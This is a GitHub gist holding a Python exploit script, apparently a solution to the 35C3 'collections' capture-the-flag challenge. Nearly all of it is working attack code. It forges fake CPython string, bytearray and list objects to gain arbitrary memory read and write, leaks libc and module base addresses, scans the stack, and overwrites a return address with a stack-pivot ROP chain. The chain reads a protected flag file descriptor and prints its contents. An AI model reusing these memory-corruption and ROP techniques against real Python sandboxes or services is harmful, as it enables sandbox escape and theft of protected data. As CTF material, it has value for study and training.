Skip to content

Instantly share code, notes, and snippets.

@m1ghtym0

m1ghtym0/collections.py

Created December 30, 2018 15:06
Show Gist options
  • Save m1ghtym0/98c9eb9ef0d8fb85b1c6fc02be1c241a to your computer and use it in GitHub Desktop.
Save m1ghtym0/98c9eb9ef0d8fb85b1c6fc02be1c241a to your computer and use it in GitHub Desktop.
Download ZIP
35c3-collections
Raw
collections.py
#import os
#flag = open("flag", "r")
#os.dup2(flag.fileno(), 1023)
#flag.close()
#
#import Collection
#a = Collection.Collection({"a":1337, "b":[1.2], "c":{"a":45545}})
#a = Collection.Collection({"a":1337, "b":[1.2], "c":{"a":45545}, "d":[1, 2]})
#b = Collection.Collection({"b":[1.2], "a":1337, "c":{"a":45545}, "d":[1, 2]})
# debug loop
#for i in range(100000000000):
# a.get("a")
foo = "AAAAAAAA"
lookup = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
def pause():
x = Collection.Collection({"a":1337, "b":[1.2], "c":{"a":45545}})
for i in range(100000000000):
x.get("a")
def chr(num):
return lookup[num]
def ord(num):
return lookup.index(num)
def p64(num):
out = ""
for i in range(8):
out += chr(num & 0xff)
num = num >> 8
return out
def u64(string):
out = 0
i = 0
for s in string[::-1]:
out += ord(s)
if i < 7:
out = out << 8
i += 1
return out
def addrof(obj):
return id(obj)
def read(addr):
"""
pwndbg> p *(PyUnicodeObject *) 0x7ffff617a4e0
$4 = {
_base = {
_base = {
ob_base = {
ob_refcnt = 1,
ob_type = 0x9d1400 <PyUnicode_Type>
},
length = 4,
hash = -1,
state = {
interned = 0,
kind = 1,
compact = 0,
ascii = 1,
ready = 1
},
wstr = 0x0
},
utf8_length = 4,
utf8 = 0x7ffff7f51788 "AAAA",
wstr_length = 0
},
data = {
any = 0x7ffff7f51788,
latin1 = 0x7ffff7f51788 "AAAA",
ucs2 = 0x7ffff7f51788,
ucs4 = 0x7ffff7f51788
}
}
pwndbg> x/15gx 0x7ffff617a4e0
0x7ffff617a4e0: 0x0000000000000001 0x00000000009d1400
0x7ffff617a4f0: 0x0000000000000004 0xffffffffffffffff
0x7ffff617a500: 0x683a713c3a6874c4 0x0000000000000000
0x7ffff617a510: 0x0000000000000004 0x00007ffff7f51788
0x7ffff617a520: 0x0000000000000000 0x00007ffff7f51788
0x7ffff617a530: 0x0000000000000000 0x0000000000000000
0x7ffff617a540: 0x0000000000000000 0x0000000000000000
0x7ffff617a550: 0x0000000000000000
"""
#payload = p64(0x1) + p64(id(str)) + p64(8) + p64(0xffffffffffffffff) + p64(0x683a713c3a6874c4) + p64(0) + p64(8) + p64(addr) + p64(0) + p64(addr)
payload = ""
payload += p64(0x4)
#payload += p64(id(str))
payload += p64(0x9d1400)
payload += p64(8)
payload += p64(0xffffffffffffffff)
payload += p64(0x683a713c3a6874c4)
payload += p64(0)
payload += p64(8)
payload += p64(addr)
payload += p64(0)
payload += p64(addr)
fakestring = id(payload)+0x48
a = Collection.Collection({"a":1337, "b":[1.2]})
b = Collection.Collection({"b":[1.2], "a":fakestring})
#return len(b.get("a"))
#return b.get("a")
return b.get("b")
def write(addr, value):
#payload = p64(0x4) + p64(0x9ce7e0) + p64(0x20) + p64(0x21) + p64(addr) + p64(addr) + p64(0)
payload = ""
payload += p64(0x4)
payload += p64(0x00000000009ce7e0) # PyByteArray_Type
payload += p64(0x20)
payload += p64(0x21)
payload += p64(addr)
payload += p64(addr)
payload += p64(0)
fakebyteobj = id(payload)+0x48
print("fakebyteobj: " + hex(fakebyteobj))
payload3 = ""
payload3 += p64(fakebyteobj)
fakelistelem = id(payload3)+0x48
print("fakelistelements: " + hex(fakelistelem))
payload2 = ""
payload2 += p64(0x4)
#payload2 += p64(id(list))
payload2 += p64(0x9c8a80)
payload2 += p64(1)
payload2 += p64(fakelistelem)
payload2 += p64(10)
fakelist = id(payload2)+0x48
print("fakelist: " + hex(fakelist))
current_val = u64(read(addr))
print("current_val = " + hex(current_val))
a = Collection.Collection({"a":1337, "b":[1.2]})
b = Collection.Collection({"b":[1.2], "a":fakelist})
list_obj = b.get("b")
print("Got back: " + hex(id(list_obj)))
byteobj = list_obj[0]
print("Got back: " + hex(id(byteobj)))
#byteobj[0] = 0x
i = 0
for c in p64(value):
byteobj[i] = ord(c)
i += 1
new_val = u64(read(addr))
print("[%s] = %s "% (hex(addr), hex(new_val)))
assert new_val == value
bar = Collection.Collection({"a":1337, "b":[1.2], "c":{"a":45545}})
#dummy = [1, 2, 3]
dummy = [0x1337]
dummy_addr = addrof(dummy)
collections_type = u64(read(addrof(bar)+8))
print("Collections-Type: " + hex(collections_type))
collections_base = collections_type - 0x2041e0
print("Collections-Base: " + hex(collections_base))
mprotect_got = collections_base + 0x2040B0
mprotect = u64(read(mprotect_got))
libc_base = mprotect - 0x11bae0
print("Libc-Base: " + hex(libc_base))
#environ_var = libc_base + 0x00000000003ee098
environ_var = 0xa4f980
#print("environ: " + hex(environ_var))
environ = u64(read(environ_var))
print("environ: " + hex(environ))
stack = environ
#stack = environ - 0x208c0
#stack = environ - 0x208c0 + (0xd000-0xc4d8)
print("Stack-Base: " + hex(stack))
mmap_libc = libc_base + 0x000000000011b9d0
write_libc = libc_base + 0x0000000000110140
readv_libc = libc_base + 0x0000000000116600
pop_rdi = 0x0000000000421612
pop_rsi = 0x000000000042110e
pop_rdx = 0x00000000004026c1
pop_rcx = 0x0000000000421103 #: pop rcx ; ret
pop_r8 = 0x000000000048ba3b
pop_r9 = 0x00000000005f4f1a # pop r9 ; pop r10 ; pop rdx ; pop rbx ; pop rbp ; ret
mov_rax = 0x00000000004adf88 #: mov rsi, rax ; mov rax, rsi ; ret
rop_chain = ""
## mmap
#rop_chain += p64(pop_r9)
#rop_chain += p64(0) #r9 -> offset
#rop_chain += p64(0) #r10
#rop_chain += p64(1) #rdx -> PROT_READ
#rop_chain += p64(0) #rbx
#rop_chain += p64(0) #rbp
#rop_chain += p64(pop_rcx)
#rop_chain += p64(0) #rcx -> flag
#rop_chain += p64(pop_r8)
#rop_chain += p64(1023) #r8 -> fd
#rop_chain += p64(pop_rsi)
#rop_chain += p64(20) #rsi -> len
#rop_chain += p64(pop_rdi)
#rop_chain += p64(0) #rdi -> rdi
#rop_chain += p64(mmap_libc)
# readv
read_buff = [x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "bytearray"][0](64)
payload = ""
payload += p64(id(read_buff))
payload += p64(64)
iovec = id(payload)+0x48
rop_chain += p64(pop_rdi)
rop_chain += p64(1023)
rop_chain += p64(pop_rsi)
rop_chain += p64(iovec)
rop_chain += p64(pop_rdx)
rop_chain += p64(1)
rop_chain += p64(readv_libc)
# write
rop_chain += p64(pop_rdi)
rop_chain += p64(1) #rdi -> fd
rop_chain += p64(pop_rsi)
rop_chain += p64(id(read_buff)) #rsi -> buf
rop_chain += p64(pop_rdx)
rop_chain += p64(4096) #rdx -> len
rop_chain += p64(write_libc)
rop_addr = id(rop_chain) + 0x48
print("ROP-chain: " + hex(rop_addr))
print("Looking for stack val")
found = False
stack_frame = stack
while not found:
print(hex(stack_frame))
val = u64(read(stack_frame))
if val == 0x4a6f10:
found = True
break
stack_frame -= 8
pop_rsp = 0x0000000000420b11 #: pop rsp ; ret
stack_rop = [pop_rsp, rop_addr]
#stack_frame = stack + 0x20778
#stack_frame = stack + 0x20778 - 0x9e65ed0
ret_val = u64(read(stack_frame))
print("stack-val: " + hex(ret_val))
#pause()
write(stack_frame+8, stack_rop[1])
write(stack_frame, stack_rop[0])
ret_val = u64(read(stack_frame))
print("stack-val: " + hex(ret_val))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment